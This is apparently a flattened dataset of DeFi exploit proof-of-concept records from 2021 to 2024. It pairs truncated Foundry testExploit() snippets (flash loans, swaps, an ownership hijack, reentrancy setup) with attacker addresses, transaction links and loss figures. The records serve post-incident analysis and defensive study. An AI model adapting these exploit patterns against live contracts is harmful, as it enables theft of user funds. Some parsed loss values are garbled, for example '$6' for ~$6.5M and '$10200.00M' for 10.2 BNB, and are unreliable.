// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~1000 $BUSD // Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 // Attack Contract : https://bscscan.com/address/0xd66a43d0a3e853b98d14268e240cf973e3fa986e // Vulnerable Contract : https://bscsca...
exploit_poc
Shell_MEV_0xa898
2024-01
Shell_MEV_0xa898_exp.sol
null
edc2d9f5d9927074
2026-01-07T10:59:16.529434
postmortems
bsc
35,273,751
~1000 $BUSD
1,000
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0xd66a43d0a3e853b98d14268e240cf973e3fa986e
https://bscscan.com/address/0xa898b78b7cbbabacf9d179c4c46c212c0ac66f46
https://bscscan.com/tx/0x24f114c0ef65d39e0988d164e052ce8052fe4a4fd303399a8c1bb855e8da01e9
null
null
true
false
false
low
~1000 $BUSD
unknown
function testExploit() public { BUSD.transfer(address(0x000000000000000000000000000000000000dEaD), BUSD.balanceOf(address(this))); emit log_named_uint("Attacker BUSD balance before attack", BUSD.balanceOf(address(this))); SHELL.approve(address(Router), type(uint256).max); while (BUSD.bal...
true
~1000 $BUSD
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0xd66a43d0a3e853b98d14268e240cf973e3fa986e
https://bscscan.com/address/0xa898b78b7cbbabacf9d179c4c46c212c0ac66f46
https://bscscan.com/tx/0x24f114c0ef65d39e0988d164e052ce8052fe4a4fd303399a8c1bb855e8da01e9
$1.0K
7.43
medium
Shell_MEV_0xa898 Exploit (2024-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$93K // Attacker : https://arbiscan.io/address/0xfcf88e5e1314ca3b6be7eed851568834233f8b49 // Attack Contract : https://arbiscan.io/address/0xfcbf411237ac830dc892edec054...
exploit_poc
CitadelFinance
2024-01
CitadelFinance_exp.sol
flash_loan
e62991399439fa99
2026-01-07T10:59:16.529481
postmortems
arbitrum
174,659,183
~$93K
93,000
https://arbiscan.io/address/0xfcf88e5e1314ca3b6be7eed851568834233f8b49
https://arbiscan.io/address/0xfcbf411237ac830dc892edec054f15ba7f9ea5a6
null
null
null
null
true
true
true
medium
~$93K
flash-loan
function testExploit() public { // Before attack // Deposit CIT tx: https://app.blocksec.com/explorer/tx/arbitrum/0xcf75802229d440e4fbabb4d357fa1886c25e9a6b5c693e9e9573c71c15e2b0d3 // Exploiter transfer to attack contract following amount of CIT: deal(address(CIT), address(this), 2653 * ...
true
~$93K
https://arbiscan.io/address/0xfcf88e5e1314ca3b6be7eed851568834233f8b49
https://arbiscan.io/address/0xfcbf411237ac830dc892edec054f15ba7f9ea5a6
$93.0K
8
high
CitadelFinance Exploit (2024-01)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$6,5M // Attacker : https://etherscan.io/address/0x87f585809ce79ae39a5fa0c7c96d0d159eb678c9 // Attack Contract : https://etherscan.io/address/0x193e045bee45c7573ff89b12...
exploit_poc
MIMSpell2
2024-01
MIMSpell2_exp.sol
flash_loan
7338c7109ba3424e
2026-01-07T10:59:16.529547
postmortems
ethereum
19,118,659
~$6,5M
6
https://etherscan.io/address/0x87f585809ce79ae39a5fa0c7c96d0d159eb678c9
https://etherscan.io/address/0x193e045bee45c7573ff89b12601c745af739ce67
null
https://app.blocksec.com/explorer/tx/eth/0x26a83db7e28838dd9fee6fb7314ae58dcc6aee9a20bf224c386ff5e80f7e4cf2
null
null
true
true
true
low
~$6,5M
flash-loan
function testExploit() public { emit log_named_decimal_uint("Exploiter MIM balance before attack", MIM.balanceOf(address(this)), MIM.decimals()); emit log_named_decimal_uint( "Exploiter WETH balance before attack", WETH.balanceOf(address(this)), WETH.decimals() ); MIM.appro...
true
~$6,5M
https://etherscan.io/address/0x87f585809ce79ae39a5fa0c7c96d0d159eb678c9
https://etherscan.io/address/0x193e045bee45c7573ff89b12601c745af739ce67
https://app.blocksec.com/explorer/tx/eth/0x26a83db7e28838dd9fee6fb7314ae58dcc6aee9a20bf224c386ff5e80f7e4cf2
$6
9
high
MIMSpell2 Exploit (2024-01)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$500K // Attacker : https://bscscan.com/address/0x1703062d657c1ca439023f0993d870f4707a37ff // Attack Contract : https://bscscan.com/address/0xafebc0a9e26fea567cc9e6dd75...
exploit_poc
MIC
2024-01
MIC_exp.sol
flash_loan
c5c835ff83e02404
2026-01-07T10:59:16.529620
postmortems
bsc
null
~$500K
500,000
https://bscscan.com/address/0x1703062d657c1ca439023f0993d870f4707a37ff
https://bscscan.com/address/0xafebc0a9e26fea567cc9e6dd7504800c67f4e3fe
https://bscscan.com/address/0xb38c2d2d6a168d41aa8eb4cead47e01badbdcf57
https://app.blocksec.com/explorer/tx/bsc/0x316c35d483b72700e6f4984650d217304146b3732bb148e32fa7f8017843eb24
null
https://x.com/MetaSec_xyz/status/1742484748239536173
true
true
true
high
~$500K
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); deal(address(this), 0); emit log_named_decimal_uint( "Exploiter BUSDT balance before attack", BUSDT.balanceOf(address(this)), BUSDT.decimals() ); // Flashloan 1700 BUSDT tokens BUSDT_USDC...
true
~$500K
https://bscscan.com/address/0x1703062d657c1ca439023f0993d870f4707a37ff
https://bscscan.com/address/0xafebc0a9e26fea567cc9e6dd7504800c67f4e3fe
https://bscscan.com/address/0xb38c2d2d6a168d41aa8eb4cead47e01badbdcf57
https://app.blocksec.com/explorer/tx/bsc/0x316c35d483b72700e6f4984650d217304146b3732bb148e32fa7f8017843eb24
https://x.com/MetaSec_xyz/status/1742484748239536173
$500.0K
10
high
MIC Exploit (2024-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$4,5M // Attacker : https://arbiscan.io/address/0x826d5f4d8084980366f975e10db6c4cf1f9dde6d // Attack Contract : https://arbiscan.io/address/0x39519c027b503f40867548fb0c...
exploit_poc
RadiantCapital
2024-01
RadiantCapital_exp.sol
flash_loan
e5a9eb4e86797fa8
2026-01-07T10:59:16.529688
postmortems
arbitrum
166,405,686
~$4,5M
4
https://arbiscan.io/address/0x826d5f4d8084980366f975e10db6c4cf1f9dde6d
https://arbiscan.io/address/0x39519c027b503f40867548fb0c890b11728faa8f
null
https://explorer.phalcon.xyz/tx/arbitrum/0x1ce7e9a9e3b6dd3293c9067221ac3260858ce119ecb7ca860eac28b2474c7c9b
null
null
true
true
true
low
~$4,5M
flash-loan
function testExploit() public { emit log_named_decimal_uint("Exploiter WETH balance before attack", WETH.balanceOf(address(this)), 18); operationId = 1; bytes memory params = abi.encode( address(RadiantLendingPool), address(rUSDCn), address(rWETH), address(WETH_USDC), uint256(1), uin...
true
~$4,5M
https://arbiscan.io/address/0x826d5f4d8084980366f975e10db6c4cf1f9dde6d
https://arbiscan.io/address/0x39519c027b503f40867548fb0c890b11728faa8f
https://explorer.phalcon.xyz/tx/arbitrum/0x1ce7e9a9e3b6dd3293c9067221ac3260858ce119ecb7ca860eac28b2474c7c9b
$4
9
high
RadiantCapital Exploit (2024-01)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~81M // Attacker : https://etherscan.io/address/0x9263e7873613ddc598a701709875634819176aff // Vulnerable Contract : https://etherscan.io/address/0x1bf68a9d1eaee7826b3593...
exploit_poc
OrbitChain
2024-01
OrbitChain_exp.sol
null
0ffd4b7015733f7f
2026-01-07T10:59:16.529759
postmortems
ethereum
18,908,049
~81M
81,000,000
https://etherscan.io/address/0x9263e7873613ddc598a701709875634819176aff
null
https://etherscan.io/address/0x1bf68a9d1eaee7826b3593c20a0ca93293cb489a
null
null
null
true
true
false
critical
~81M
unknown
function testExploit() public { deal(address(WBTC), orbitExploiterToAddr, 0); emit log_named_decimal_uint( "Exploiter WBTC balance before attack", WBTC.balanceOf(orbitExploiterToAddr), WBTC.decimals() ); // At first exploiter has deposited some WBTC tokens (acquired from Unis...
true
~81M
https://etherscan.io/address/0x9263e7873613ddc598a701709875634819176aff
https://etherscan.io/address/0x1bf68a9d1eaee7826b3593c20a0ca93293cb489a
$81.00M
7.45
medium
OrbitChain Exploit (2024-01)
true
true
false
false
// SPDX-License-Identifier: MIT pragma solidity 0.8.10; import "forge-std/Test.sol"; import "forge-std/console.sol"; /*Key Information The Levyathan developers left the private keys to a wallet with minting capability available on Github. -rekt Attacker Address : 0x7507f84610f6d656a70eb8cdec04467...
exploit_poc
Levyathan
2021-07
Levyathan_exp.sol
null
d639d357c57d955d
2026-01-07T10:59:16.529823
postmortems
bsc
9,545,966
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function test_Timelock() public { bytes memory Ownership_hijack = (abi.encodePacked(bytes4(keccak256(bytes("transferOwnership(address)"))), abi.encode(address(attacker)))); //Schedule a transaction from the Deployer current owner of timelock. vm.startPrank(address(Deployer)); ...
true
Unknown
4.7
low
Levyathan Exploit (2021-07)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~1,6M // Attacker : https://etherscan.io/address/0x4d0d746e0f66bf825418e6b3def1a46ec3c0b847 // Attack Contract : https://etherscan.io/address/0x7e5433f02f4bf07c4f2a2d341...
exploit_poc
FloorProtocol
2023-12
FloorProtocol_exp.sol
null
24629e4e6ef66753
2026-01-07T10:59:16.529883
postmortems
ethereum
18,802,287
~1,6M
1
https://etherscan.io/address/0x4d0d746e0f66bf825418e6b3def1a46ec3c0b847
https://etherscan.io/address/0x7e5433f02f4bf07c4f2a2d341c450e07d7531428
https://etherscan.io/address/0xc538d17a6aacc5271be5f51b891e2e92c8187edd
https://explorer.phalcon.xyz/tx/eth/0xec8f6d8e114caf8425736e0a3d5be2f93bbea6c01a50a7eeb3d61d2634927b40
null
null
true
true
false
low
~1,6M
unknown
function testExploit() public { emit log_named_uint("Victim PPG token balance before attack", PPG.balanceOf(victim)); emit log_named_uint("Attacker PPG token balance before attack", PPG.balanceOf(address(this))); IERC1967Proxy.CallData[] memory calls = new IERC1967Proxy.CallData[](PPG.balanceOf...
true
~1,6M
https://etherscan.io/address/0x4d0d746e0f66bf825418e6b3def1a46ec3c0b847
https://etherscan.io/address/0x7e5433f02f4bf07c4f2a2d341c450e07d7531428
https://etherscan.io/address/0xc538d17a6aacc5271be5f51b891e2e92c8187edd
https://explorer.phalcon.xyz/tx/eth/0xec8f6d8e114caf8425736e0a3d5be2f93bbea6c01a50a7eeb3d61d2634927b40
$1
7.58
medium
FloorProtocol Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~165K USD$ // Attacker : https://bscscan.com/address/0xbbcc139933d1580e7c40442e09263e90e6f1d66d // Attack Contract : https://bscscan.com/address/0x69bd13f775505989883768...
exploit_poc
ElephantStatus
2023-12
ElephantStatus_exp.sol
null
e37fa1714a692c4b
2026-01-07T10:59:16.529937
postmortems
bsc
34,114,760
~165K USD$
165,000
https://bscscan.com/address/0xbbcc139933d1580e7c40442e09263e90e6f1d66d
https://bscscan.com/address/0x69bd13f775505989883768ebd23d528c708d6bcf
https://bscscan.com/address/0x8cf0a553ab3896e4832ebcc519a7a60828ab5740
https://explorer.phalcon.xyz/tx/bsc/0xd423ae0e95e9d6c8a89dcfed243573867e4aad29ee99a9055728cbbe0a523439
null
null
true
true
false
high
~165K USD$
unknown
function testExploit() public { emit log_named_decimal_uint( "Exploiter BUSD balance before attack", BUSD.balanceOf(address(this)), BUSD.decimals() ); USDC_BUSD.flash( address(this), 0, BUSD.balanceOf(address(USDC_BUSD)), abi.encode(ui...
true
~165K USD$
https://bscscan.com/address/0xbbcc139933d1580e7c40442e09263e90e6f1d66d
https://bscscan.com/address/0x69bd13f775505989883768ebd23d528c708d6bcf
https://bscscan.com/address/0x8cf0a553ab3896e4832ebcc519a7a60828ab5740
https://explorer.phalcon.xyz/tx/bsc/0xd423ae0e95e9d6c8a89dcfed243573867e4aad29ee99a9055728cbbe0a523439
$165.0K
8.25
high
ElephantStatus Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : ~$4.4K // Attacker : https://bscscan.com/address/0xd227dc77561b58c5a2d2644ac0173152a1a5dc3d // Attack Contract : https://bscscan.com/address/0xa47b9f87173eda364c821234158dda47b03ac217 // Vulnerable Con...
exploit_poc
Channels
2023-12
Channels_exp.sol
null
3f65e82d48d1e027
2026-01-07T10:59:16.529998
postmortems
bsc
34,847,596
~$4.4K
4,400
https://bscscan.com/address/0xd227dc77561b58c5a2d2644ac0173152a1a5dc3d
https://bscscan.com/address/0xa47b9f87173eda364c821234158dda47b03ac217
https://bscscan.com/address/0xca797539f004c0f9c206678338f820ac38466d4b,
https://bscscan.com/tx/0xcf729a9392b0960cd315d7d49f53640f000ca6b8a0bd91866af5821fdf36afc5
https://app.blocksec.com/explorer/tx/bsc/0xcf729a9392b0960cd315d7d49f53640f000ca6b8a0bd91866af5821fdf36afc5
null
true
true
false
low
~$4.4K
unknown
false
~$4.4K
https://bscscan.com/address/0xd227dc77561b58c5a2d2644ac0173152a1a5dc3d
https://bscscan.com/address/0xa47b9f87173eda364c821234158dda47b03ac217
https://bscscan.com/address/0xca797539f004c0f9c206678338f820ac38466d4b,
https://bscscan.com/tx/0xcf729a9392b0960cd315d7d49f53640f000ca6b8a0bd91866af5821fdf36afc5
https://app.blocksec.com/explorer/tx/bsc/0xcf729a9392b0960cd315d7d49f53640f000ca6b8a0bd91866af5821fdf36afc5
$4.4K
7
medium
Channels Exploit (2023-12)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~5 $WBNB // Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 // Attack Contract : https://bscscan.com/address/0xaed80b8a821607981e5e58b7a753a3336c0bfd6f // Vulnerable Contract : https://bscscan.c...
exploit_poc
DominoTT
2023-12
DominoTT_exp.sol
flash_loan
893c6e0561993fbb
2026-01-07T10:59:16.530055
postmortems
bsc
34,141,660
~5 $WBNB
5
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0xaed80b8a821607981e5e58b7a753a3336c0bfd6f
https://bscscan.com/address/0x0dabdc92af35615443412a336344c591faed3f90
https://app.blocksec.com/explorer/tx/bsc/0x1ee617cd739b1afcc673a180e60b9a32ad3ba856226a68e8748d58fcccc877a8
null
null
true
false
true
low
~5 $WBNB
flash-loan
function testExploit() public { emit log_named_uint("Attacker WBNB balance before attack", WBNB.balanceOf(address(this))); DominoTT.approve(address(Router), type(uint256).max); WBNB.approve(address(Router), type(uint256).max); DODO.flashLoan(0.5 * 1e18, 0, address(this), new bytes(1)); ...
true
~5 $WBNB
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0xaed80b8a821607981e5e58b7a753a3336c0bfd6f
https://bscscan.com/address/0x0dabdc92af35615443412a336344c591faed3f90
https://app.blocksec.com/explorer/tx/bsc/0x1ee617cd739b1afcc673a180e60b9a32ad3ba856226a68e8748d58fcccc877a8
$5
9.41
high
DominoTT Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : ~10.2BNB // Attacker : https://bscscan.com/address/0x9c66b0c68c144ffe33e7084fe8ce36ebc44ad21e // Attack Contract : https://bscscan.com/address/0xe9616ff20ad519bce0e3d61353a37232f0c27a50 // Vulnerable C...
exploit_poc
BCT
2023-12
BCT_exp.sol
null
71d7daf523c81a34
2026-01-07T10:59:16.530128
postmortems
bsc
34,204,710
~10.2BNB
10,200,000,000
https://bscscan.com/address/0x9c66b0c68c144ffe33e7084fe8ce36ebc44ad21e
https://bscscan.com/address/0xe9616ff20ad519bce0e3d61353a37232f0c27a50
https://bscscan.com/address/0x88b3eb62e363d9f153beab49c5c2ef2e785a375a
https://bscscan.com/tx/0xdae0b85e01670e6b6b317657a72fb560fc388664cf8bfdd9e1b0ae88e0679103
null
null
true
true
false
critical
~10.2BNB
unknown
function testExploit() public { uint256 before = Wbnb.balanceOf(address(this)); init(); // simulate the first tx for preparation // attack begin PancakePair.swap(20_000_000_000_000_000_000, 0, address(this), abi.encode("0x20")); emit log_named_decimal_uint( "[End] Aft...
true
~10.2BNB
https://bscscan.com/address/0x9c66b0c68c144ffe33e7084fe8ce36ebc44ad21e
https://bscscan.com/address/0xe9616ff20ad519bce0e3d61353a37232f0c27a50
https://bscscan.com/address/0x88b3eb62e363d9f153beab49c5c2ef2e785a375a
https://bscscan.com/tx/0xdae0b85e01670e6b6b317657a72fb560fc388664cf8bfdd9e1b0ae88e0679103
$10200.00M
9
high
BCT Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$208K // Attacker : https://etherscan.io/address/0x5a7c7eb8d13a53d42a15d2b1d1b694ccc5141ea5 // Attack Contract : https://etherscan.io/address/0x03b7bb750a974e0bd3479501...
exploit_poc
bZx
2023-12
bZx_exp.sol
flash_loan
2e9fee8a892fb79b
2026-01-07T10:59:16.530209
postmortems
ethereum
null
~$208K
208,000
https://etherscan.io/address/0x5a7c7eb8d13a53d42a15d2b1d1b694ccc5141ea5
https://etherscan.io/address/0x03b7bb750a974e0bd34795013f66b669f4110e54
https://etherscan.io/address/0x7f3fe9d492a9a60aebb06d82cba23c6f32cad10b
null
null
https://x.com/MetaSec_xyz/status/1730811240942088263
true
true
true
high
~$208K
flash-loan
function testExploit() public { // In this POC I demonstrate first attack tx deal(address(this), 0); emit log_named_decimal_uint("Exploiter WETH balance before attack", WETH.balanceOf(address(this)), 18); uint256 yfiFlashAmount = YFI.balanceOf(address(YFI_WETH)) / 10; // If the d...
true
~$208K
https://etherscan.io/address/0x5a7c7eb8d13a53d42a15d2b1d1b694ccc5141ea5
https://etherscan.io/address/0x03b7bb750a974e0bd34795013f66b669f4110e54
https://etherscan.io/address/0x7f3fe9d492a9a60aebb06d82cba23c6f32cad10b
https://x.com/MetaSec_xyz/status/1730811240942088263
$208.0K
9
high
bZx Exploit (2023-12)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~84.59 ETH // Attacker : https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a // Attack Contract : https://etherscan.io/address/0x6980a47bee930a4584b0...
exploit_poc
TIME
2023-12
TIME_exp.sol
null
0dae8f6658c623d7
2026-01-07T10:59:16.530282
postmortems
ethereum
18,730,462
~84.59 ETH
84.59
https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a
https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0
https://etherscan.io/address/0x4b0e9a7da8bab813efae92a6651019b8bd6c0a29
https://explorer.phalcon.xyz/tx/eth/0xecdd111a60debfadc6533de30fb7f55dc5ceed01dfadd30e4a7ebdb416d2f6b6
null
null
true
true
false
low
~84.59 ETH
unknown
function testExploit() public { deal(address(this), 5 ether); emit log_named_decimal_uint("Exploiter ETH balance before attack", address(this).balance, 18); TIME.approve(address(Router), type(uint256).max); WETH.approve(address(Router), type(uint256).max); WETH.deposit{value: 5 e...
true
~84.59 ETH
https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a
https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0
https://etherscan.io/address/0x4b0e9a7da8bab813efae92a6651019b8bd6c0a29
https://explorer.phalcon.xyz/tx/eth/0xecdd111a60debfadc6533de30fb7f55dc5ceed01dfadd30e4a7ebdb416d2f6b6
$85
8.26
high
TIME Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : ~3BNB // Attacker : https://bscscan.com/address/0xcb733f075ae67a83a9c5f38a0864596e338a0106 // Attack Contract : https://bscscan.com/address/0x0fe1983b8972630c866fe77ad873a66ec598b685 // Vulnerable Cont...
exploit_poc
Bob
2023-12
Bob_exp.sol
flash_loan
cdfd2cfc70451690
2026-01-07T10:59:16.530331
postmortems
bsc
34,428,628
~3BNB
3,000,000,000
https://bscscan.com/address/0xcb733f075ae67a83a9c5f38a0864596e338a0106
https://bscscan.com/address/0x0fe1983b8972630c866fe77ad873a66ec598b685
https://bscscan.com/address/0x10ed43c718714eb63d5aa57b78b54704e256024e
https://bscscan.com/tx/0xfb14292a531411f852993e5a3ba4e7eb63ed548220267b9b3f4aacc5572d3a58
null
null
true
true
true
critical
~3BNB
flash-loan
function testExploit() public { // WBNB.approve(address(Router), type(uint256).max); // HackDao.approve(address(Router), type(uint256).max); DVM(dodo).flashLoan(100 * 1e18, 0, address(this), "0x00"); emit log_named_decimal_uint("[End] Attacker BNB balance after exploit", WBNB.balanceOf(...
true
~3BNB
https://bscscan.com/address/0xcb733f075ae67a83a9c5f38a0864596e338a0106
https://bscscan.com/address/0x0fe1983b8972630c866fe77ad873a66ec598b685
https://bscscan.com/address/0x10ed43c718714eb63d5aa57b78b54704e256024e
https://bscscan.com/tx/0xfb14292a531411f852993e5a3ba4e7eb63ed548220267b9b3f4aacc5572d3a58
$3000.00M
9.32
high
Bob Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~2 $BNB // Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 // Vulnerable Contract : https://bscscan.com/address/0x4308d314096878d3bf16c9d8db86101f70bbebf1 // Attack Tx : https://bscscan.com/tx/0...
exploit_poc
PHIL
2023-12
PHIL_exp.sol
null
af520fa11d69979a
2026-01-07T10:59:16.530383
postmortems
bsc
34,345,320
~2 $BNB
2
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
null
https://bscscan.com/address/0x4308d314096878d3bf16c9d8db86101f70bbebf1
https://bscscan.com/tx/0x20ecd8310a2cc7f7774aa5a045c8a99ad84a8451d6650f24e0911e9f4355b13a
null
null
true
false
false
low
~2 $BNB
unknown
function testExploit() public { emit log_named_decimal_uint("Attacker WBNB balance before attack", WBNB.balanceOf(address(this)), 18); PHIL.simpleToken(); TOKENToWETH(); emit log_named_decimal_uint("Attacker WBNB balance after attack", WBNB.balanceOf(address(this)), 18); }
true
~2 $BNB
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0x4308d314096878d3bf16c9d8db86101f70bbebf1
https://bscscan.com/tx/0x20ecd8310a2cc7f7774aa5a045c8a99ad84a8451d6650f24e0911e9f4355b13a
$2
7.03
medium
PHIL Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~3M (info from hacked.slowmist.io) // Attacker : https://etherscan.io/address/0xb1edf2a0ba8bc789cbc3dfbe519737cada034d2d // Attacker Contract : https://etherscan.io/addr...
exploit_poc
NFTTrader
2023-12
NFTTrader_exp.sol
reentrancy
486da90b406f5537
2026-01-07T10:59:16.530431
postmortems
ethereum
18,799,414
~3M (info from hacked.slowmist.io)
3,000,000
https://etherscan.io/address/0xb1edf2a0ba8bc789cbc3dfbe519737cada034d2d
null
https://etherscan.io/address/0xc310e760778ecbca4c65b6c559874757a4c4ece0
https://explorer.phalcon.xyz/tx/eth/0xec7523660f8b66d9e4a5931d97ad8b30acc679c973b20038ba4c15d4336b393d
null
null
true
true
true
critical
~3M (info from hacked.slowmist.io)
reentrancy
function testExploit() public { deal(address(this), 0.001 ether); IUniV3PosNFT.MintParams memory params = IUniV3PosNFT.MintParams({ token0: address(USDC), token1: address(WETH), fee: 500, tickLower: 0, tickUpper: 100_000, amount0De...
true
~3M (info from hacked.slowmist.io)
https://etherscan.io/address/0xb1edf2a0ba8bc789cbc3dfbe519737cada034d2d
https://etherscan.io/address/0xc310e760778ecbca4c65b6c559874757a4c4ece0
https://explorer.phalcon.xyz/tx/eth/0xec7523660f8b66d9e4a5931d97ad8b30acc679c973b20038ba4c15d4336b393d
$3.00M
10
high
NFTTrader Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~200K USD$ // Attacker : https://etherscan.io/address/0x3ea6ba6d3415e4dfd380516c799aafa94e420519 // Attack Contract : https://etherscan.io/address/0xba6fa6e8500cd8eeda8e...
exploit_poc
HYPR
2023-12
HYPR_exp.sol
null
5714b56248913628
2026-01-07T10:59:16.530494
postmortems
ethereum
18,774,584
~200K USD$
200,000
https://etherscan.io/address/0x3ea6ba6d3415e4dfd380516c799aafa94e420519
https://etherscan.io/address/0xba6fa6e8500cd8eeda8ebb9dfbcc554ff4a3eb77
https://etherscan.io/address/0x40c31236b228935b0329eff066b1ad96e319595e
https://explorer.phalcon.xyz/tx/eth/0x51ce3d9cfc85c1f6a532b908bb2debb16c7569eb8b76effe614016aac6635f65
null
null
true
true
false
high
~200K USD$
unknown
function testExploit() public { emit log_named_decimal_uint( "Exploiter HYPR balance before attack", HYPR.balanceOf(address(this)), HYPR.decimals() ); ChugSplash.initialize(address(this)); ChugSplash.finalizeERC20Withdrawal( address(HYPR), l2Token, address(ChugSp...
true
~200K USD$
https://etherscan.io/address/0x3ea6ba6d3415e4dfd380516c799aafa94e420519
https://etherscan.io/address/0xba6fa6e8500cd8eeda8ebb9dfbcc554ff4a3eb77
https://etherscan.io/address/0x40c31236b228935b0329eff066b1ad96e319595e
https://explorer.phalcon.xyz/tx/eth/0x51ce3d9cfc85c1f6a532b908bb2debb16c7569eb8b76effe614016aac6635f65
$200.0K
7.17
medium
HYPR Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$500K // Attacker : https://bscscan.com/address/0xa9edec4496bd013dac805fb221edefc53cbfaf05 // Attack Contract : https://bscscan.com/address/0x791626eb05e60fac973646ac8d...
exploit_poc
UnverifiedContr_0x431abb
2023-12
UnverifiedContr_0x431abb_exp.sol
flash_loan
806de7f8c13eb065
2026-01-07T10:59:16.530537
postmortems
bsc
33,972,111
~$500K
500,000
https://bscscan.com/address/0xa9edec4496bd013dac805fb221edefc53cbfaf05
https://bscscan.com/address/0x791626eb05e60fac973646ac8d67b008b939fe88
null
null
null
null
true
true
true
high
~$500K
flash-loan
function testExploit() public { // Exploiter transfer to attack contract following amounts of tokens (for staking) before attack: deal(address(TRUST), address(this), 171_150_509_328_412_454 + 283_615_706_379_311_069); deal(address(KLEN), address(this), 2848 * 1e18 + 2_999_999_999_999_999_999_999...
true
~$500K
https://bscscan.com/address/0xa9edec4496bd013dac805fb221edefc53cbfaf05
https://bscscan.com/address/0x791626eb05e60fac973646ac8d67b008b939fe88
$500.0K
8
high
UnverifiedContr_0x431abb Exploit (2023-12)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : ~$13K (250 COMP Token) // Attacker : https://etherscan.io/address/0xdfab184bc668f16c1cb949228068588106924569 // Attack Contract : https://etherscan.io/address/0x2d89fb83c66b6c7c35818382517959e33a655b13...
exploit_poc
GoodCompound
2023-12
GoodCompound_exp.sol
flash_loan
6615f032074669fa
2026-01-07T10:59:16.530597
postmortems
ethereum
18,759,541
~$13K (250 COMP Token)
13,000
https://etherscan.io/address/0xdfab184bc668f16c1cb949228068588106924569
https://etherscan.io/address/0x2d89fb83c66b6c7c35818382517959e33a655b13
https://etherscan.io/address/0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b
https://etherscan.io/tx/0x1106418384414ed56cd7cbb9fedc66a02d39b663d580abc618f2d387348354ab
null
null
true
true
true
medium
~$13K (250 COMP Token)
flash-loan
function testExploit() public { emit log_named_decimal_uint( "[Begin] Attacker COMP before exploit", compound_token.balanceOf(profit_receiver), 18 ); address[] memory path = new address[](2); path[0] = address(compound); path[1] = address(weth); uint256[] memo...
true
~$13K (250 COMP Token)
https://etherscan.io/address/0xdfab184bc668f16c1cb949228068588106924569
https://etherscan.io/address/0x2d89fb83c66b6c7c35818382517959e33a655b13
https://etherscan.io/address/0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b
https://etherscan.io/tx/0x1106418384414ed56cd7cbb9fedc66a02d39b663d580abc618f2d387348354ab
$13.0K
10
high
GoodCompound Exploit (2023-12)
true
true
true
false
